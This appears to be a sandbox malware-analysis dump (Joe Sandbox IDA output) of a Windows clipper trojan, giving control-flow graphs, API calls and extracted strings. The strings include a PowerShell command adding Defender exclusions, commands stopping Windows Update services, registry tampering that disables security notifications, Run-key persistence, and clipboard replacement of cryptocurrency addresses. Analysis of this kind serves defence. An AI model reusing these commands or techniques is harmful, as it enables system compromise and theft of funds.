GetClipboardData 6140->6144 6142 405b85 SendMessageA 6141->6142 6141->6143 6142->6143 6143->6130 6144->6143 6145 405add GlobalLock 6144->6145 6145->6143 6146 405af5 6145->6146 6147 405b08 6146->6147 6148 405b29 6146->6148 6149 405b3e 6147->6149 6150 405b0e 6147->6150 6151 40d250 13 API calls 6148->6151 6166 4057f0 6149->6166 6152 405b14 GlobalUnlock CloseClipboard 6150->6152 6160 405680 6150->6160 6151->6152 6152->6141 6156 405b67 6152->6156 6174 404970 lstrlenW 6156->6174 6159 40ab60 _invalid_parameter 3 API calls 6159->6141 6161 40568b 6160->6161 6162 405691 lstrlenW 6161->6162 6163 4056a4 6161->6163 6164 40a950 _invalid_parameter 7 API calls 6161->6164 6165 4056c1 lstrcpynW 6161->6165 6162->6161 6162->6163 6163->6152 6164->6161 6165->6161 6165->6163 6169 4057fd 6166->6169 6167 405803 lstrlenA 6167->6169 6173 405816 6167->6173 6168 405740 2 API calls 6168->6169 6169->6167 6169->6168 6170 40a950 _invalid_parameter 7 API calls 6169->6170 6172 40ab60 _invalid_parameter 3 API calls 6169->6172 6169->6173 6208 4057a0 6169->6208 6170->6169 6172->6169 6173->6152 6182 4049a4 6174->6182 6175 404bfd 6175->6159 6176 404e81 StrStrW 6177 404e94 6176->6177 6178 404e98 StrStrW 6176->6178 6177->6178 6180 404eab 6178->6180 6181 404eaf StrStrW 6178->6181 6179 404c0f 6179->6175 6179->6176 6180->6181 6183 404ec2 6181->6183 6182->6175 6182->6179 6185 404d90 StrStrW 6182->6185 6192 404ed8 6183->6192 6213 4048a0 lstrlenW 6183->6213 6185->6179 6186 404dbb StrStrW 6185->6186 6186->6179 6187 404de6 StrStrW 6186->6187 6187->6179 6188 4054aa StrStrW 6193 4054c4 StrStrW 6188->6193 6194 4054bd 6188->6194 6189 40544f StrStrW 6190 405462 6189->6190 6191 40546b StrStrW 6189->6191 6190->6188 6191->6190 6197 405487 StrStrW 6191->6197 6192->6175 6192->6188 6192->6189 6195 4054d7 6193->6195 6196 4054de StrStrW 6193->6196 6194->6193 6195->6196 6198 4054f1 6196->6198 6199 4054f8 StrStrW 6196->6199 6197->6190 6198->6199 6200 405512 StrStrW 6199->6200 6201 40550b 6199->6201 6203 405525 lstrlenA 6200->6203 6201->6200 6203->6175 6204 4055ff GlobalAlloc 6203->6204 6204->6175 6205 40561a GlobalLock 6204->6205 6205->6175 6206 40562d memcpy GlobalUnlock OpenClipboard 6205->6206 6206->6175 6207 40565a EmptyClipboard SetClipboardData CloseClipboard 6206->6207 6207->6175 6209 4057ab 6208->6209 6210 4057b1 lstrlenA 6209->6210 6211 405740 2 API calls 6209->6211 6212 4057e4 6209->6212 6210->6209 6211->6209 6212->6169 6214 4048c4 6213->6214 6215 40490d 6214->6215 6216 404911 iswalpha 6214->6216 6217 40492c iswdigit 6214->6217 6215->6192 6216->6214 6216->6217 6217->6214 5865 4084f9 5866 408502 5865->5866 5867 408511 34 API calls 5866->5867 5868 409346 5866->5868 6218 405fbd 6220 405f51 6218->6220 6219 40ab60 _invalid_parameter 3 API calls 6221 405fc8 LeaveCriticalSection 6219->6221 6222 405fa6 memcpy 6220->6222 6223 405fbb 6220->6223 6222->6223 6223->6219 6225 40ac3e 6226 40ab60 _invalid_parameter 3 API calls 6225->6226 6229 40abfd 6226->6229 6227 40ac12 6228 40a950 _invalid_parameter 7 API calls 6228->6229 6229->6227 6229->6228 6230 40ac14 memcpy 6229->6230 6230->6229

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 88 40f1b0-40f1dc GetLocaleInfoA strcmp 89 40f1e2 88->89 90 40f1de-40f1e0 88->90 91 40f1e4-40f1e7 89->91 90->91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                                                                              • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocalestrcmp
                                                                                                                                                                                              • String ID: UKR
                                                                                                                                                                                              • API String ID: 3191669094-64918367
                                                                                                                                                                                              • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                              • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 5 407dcb-407df6 RegOpenKeyExW 3->5 6 407d9f-407dc5 RegSetValueExW RegCloseKey 3->6 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 5->8 9 407df8-407e1e RegSetValueExW RegCloseKey 5->9 6->5 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 17 407ed6-407f01 RegOpenKeyExW 12->17 18 407eaa-407ed0 RegSetValueExW RegCloseKey 12->18 15 407b36-407b78 Sleep wsprintfW CopyFileW 14->15 16 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->16 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 15->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 15->23 16->15 21 407ac8-407afb wcslen RegSetValueExW 16->21 19 407f03-407f29 RegSetValueExW RegCloseKey 17->19 20 407f2f-407f5a RegOpenKeyExW 17->20 18->17 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 30 407cc3-407cf6 wcslen RegSetValueExW 24->30 32 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->32 33 40801f-40804a RegOpenKeyExW 25->33 26->25 27->15 28->27 43 407b21-407b23 ExitProcess 28->43 34 407c1b-407c22 RegCloseKey 29->34 35 407bef-407c11 RegCloseKey call 40f400 29->35 36 407d24-407d2b RegCloseKey 30->36 37 407cf8-407d1a RegCloseKey call 40f400 30->37 32->33 39 408050-4080d3 RegSetValueExW * 4 RegCloseKey 33->39 40 4080d9-408104 RegOpenKeyExW 33->40 34->22 35->34 50 407c13-407c15 ExitProcess 35->50 36->3 37->36 51 407d1c-407d1e ExitProcess 37->51 39->40 44 4081f0-40821b RegOpenKeyExW 40->44 45 40810a-4081ea RegSetValueExW * 7 RegCloseKey 40->45 48 408221-408301 RegSetValueExW * 7 RegCloseKey 44->48 49 408307-40831c Sleep call 40d180 44->49 45->44 48->49 54 408491-40849a 49->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 49->55 55->54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 0040794E
                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
                                                                                                                                                                                              • PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004079DA
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?), ref: 004079EA
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                                                                              • wcscmp.NTDLL ref: 00407A13
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                                                                              • API String ID: 4172876685-159212852
                                                                                                                                                                                              • Opcode ID: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
                                                                                                                                                                                              • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
                                                                                                                                                                                              • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 82 40f400-40f460 memset * 2 CreateProcessW 83 40f471-40f495 ShellExecuteW 82->83 84 40f462-40f46f Sleep 82->84 86 40f4a6 83->86 87 40f497-40f4a4 Sleep 83->87 85 40f4a8-40f4ab 84->85 86->85 87->85
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040F40E
                                                                                                                                                                                              • memset.NTDLL ref: 0040F41E
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 0040F467
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                              • String ID: $D$open
                                                                                                                                                                                              • API String ID: 3787208655-2182757814
                                                                                                                                                                                              • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                              • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 92 4068e0-4068f5 _chkstk 93 4068f7-4068f9 92->93 94 4068fe-4069d0 wsprintfW * 6 PathFileExistsW 92->94 95 406f64-406f67 93->95 96 4069d2-4069f3 call 40f1f0 94->96 97 406a14-406a23 PathFileExistsW 94->97 96->97 107 4069f5-406a0e SetFileAttributesW DeleteFileW 96->107 99 406ac4-406acd 97->99 100 406a29-406a38 PathFileExistsW 97->100 101 406af5-406b04 PathFileExistsW 99->101 102 406acf-406ada call 4064a0 99->102 104 406a59-406a68 PathFileExistsW 100->104 105 406a3a-406a53 SetFileAttributesW DeleteFileW 100->105 108 406b06-406b26 call 40f1f0 101->108 109 406b47-406b56 PathFileExistsW 101->109 102->101 120 406adc-406af0 call 40f1f0 102->120 110 406a6a-406a7b CreateDirectoryW 104->110 111 406a8c-406a9b PathFileExistsW 104->111 105->104 107->97 108->109 129 406b28-406b41 SetFileAttributesW DeleteFileW 108->129 115 406b58-406b62 109->115 116 406bca-406bd9 PathFileExistsW 109->116 110->111 114 406a7d-406a86 SetFileAttributesW 110->114 111->99 117 406a9d-406ab3 CopyFileW 111->117 114->111 115->116 122 406b64-406b71 PathFileExistsW 115->122 118 406c75-406c96 FindFirstFileW 116->118 119 406bdf-406bee PathFileExistsW 116->119 117->99 123 406ab5-406abe SetFileAttributesW 117->123 126 406c9c-406d54 118->126 127 406f5e 118->127 124 406bf0-406bf6 119->124 125 406c2c-406c32 119->125 120->101 122->116 130 406b73-406b89 CopyFileW 122->130 123->99 132 406c12-406c27 call 406660 124->132 133 406bf8-406c10 call 406660 124->133 136 406c34-406c4c call 406660 125->136 137 406c4e-406c63 call 406660 125->137 134 406d5e-406d72 lstrcmpW 126->134 127->95 129->109 130->116 131 406b8b-406ba9 SetFileAttributesW PathFileExistsW 130->131 131->116 138 406bab-406bc4 SetFileAttributesW DeleteFileW 131->138 153 406c2a 132->153 133->153 141 406d74-406d88 lstrcmpW 134->141 142 406d8a 134->142 151 406c66-406c6f SetFileAttributesW 136->151 137->151 138->116 141->142 147 406d8f-406da0 141->147 148 406f35-406f4b FindNextFileW 142->148 154 406db1-406db8 147->154 148->134 152 406f51-406f58 FindClose 148->152 151->118 152->127 153->151 155 406de6-406def 154->155 156 406dba-406dd7 lstrcmpiW 154->156 157 406df1 155->157 158 406df6-406e07 155->158 159 406dd9 156->159 160 406ddb-406de2 156->160 157->148 161 406e18-406e1f 158->161 159->154 160->155 163 406e21-406e3e PathMatchSpecW 161->163 164 406e8f-406e98 161->164 165 406e40 163->165 166 406e42-406e88 wsprintfW SetFileAttributesW DeleteFileW 163->166 167 406e9a 164->167 168 406e9f-406eae PathFileExistsW 164->168 165->161 166->164 167->148 170 406eb0 168->170 171 406eb5-406f05 wsprintfW * 2 168->171 170->148 172 406f07-406f1d call 4067a0 171->172 173 406f1f-406f2f MoveFileExW 171->173 172->148 173->148
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                                                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                                                                              • API String ID: 495142193-638321828
                                                                                                                                                                                              • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                              • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                              • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 0040498C
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D99
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404DC4
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,addr), ref: 00404DEF
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404E8A
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404EA1
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,nano_), ref: 00404EB8
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,bnb), ref: 00405458
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,bc1p), ref: 00405474
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,bc1q), ref: 00405490
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,ronin:), ref: 004054B3
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 004054CD
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,cosmos), ref: 004054E7
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,addr), ref: 00405501
                                                                                                                                                                                              • StrStrW.SHLWAPI(00000000,nano_), ref: 0040551B
                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 004055F0
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040560B
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040561E
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,-00000001), ref: 0040563C
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405648
                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405650
                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 0040565A
                                                                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00405666
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040566C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
                                                                                                                                                                                              • String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                                                                                                                                                                              • API String ID: 2017104846-250561147
                                                                                                                                                                                              • Opcode ID: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                                                                              • Instruction ID: 6e0617124f46e3e1bef08e4e409f6ed46b9961a6860853f8336ff2275e542cf2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                                                                              • Instruction Fuzzy Hash: 609237B0A04218EACF58CF41C0945BE7BB2AF82751F60C06BE9456F294C77D8EC1DB99

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl_aullshr
                                                                                                                                                                                              • String ID: Y
                                                                                                                                                                                              • API String ID: 673498613-3233089245
                                                                                                                                                                                              • Opcode ID: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                                                                              • Instruction ID: 8bc4f449e96fa991b651f766feedb24339ddc98edc011673b3c5a2d60d79d6a0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 79D23A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl_aullshr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 673498613-0
                                                                                                                                                                                              • Opcode ID: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                                                                              • Instruction ID: affa05b9e3e18e999c7216c09a62115e88c49fe898542c2adc9745ce68515915
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 707 4059b0-4059d2 GetWindowLongW 708 4059d4-4059db 707->708 709 4059f6-4059fd 707->709 710 4059e1-4059e5 708->710 711 405a67-405a78 IsClipboardFormatAvailable 708->711 712 405a26-405a2c 709->712 713 4059ff 709->713 719 405a04-405a21 SetClipboardViewer SetWindowLongW 710->719 720 4059e7-4059eb 710->720 717 405a83-405a8d IsClipboardFormatAvailable 711->717 718 405a7a-405a81 711->718 715 405a46-405a4a 712->715 716 405a2e-405a44 SetWindowLongW 712->716 714 405be4-405bfd DefWindowProcA 713->714 721 405a62 715->721 722 405a4c-405a5c SendMessageA 715->722 716->721 724 405a98-405aa2 IsClipboardFormatAvailable 717->724 725 405a8f-405a96 717->725 723 405aab-405aaf 718->723 719->714 726 4059f1 720->726 727 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 720->727 721->714 722->721 729 405ab5-405abf OpenClipboard 723->729 730 405b7f-405b83 723->730 724->723 728 405aa4 724->728 725->723 726->714 727->714 728->723 729->730 733 405ac5-405ad6 GetClipboardData 729->733 731 405b85-405b95 SendMessageA 730->731 732 405b9b 730->732 731->732 732->714 734 405ad8 733->734 735 405add-405aee GlobalLock 733->735 734->714 736 405af0 735->736 737 405af5-405b06 735->737 736->714 738 405b08-405b0c 737->738 739 405b29-405b3c call 40d250 737->739 740 405b3e-405b4e call 4057f0 738->740 741 405b0e-405b12 738->741 747 405b51-405b65 GlobalUnlock CloseClipboard 739->747 740->747 743 405b14 741->743 744 405b16-405b27 call 405680 741->744 743->747 744->747 747->730 750 405b67-405b7c call 404970 call 40ab60 747->750 750->730
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                                                                              • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                                                                              • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                                                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                                                                              • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                                                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                                                                              Memory Dump Source
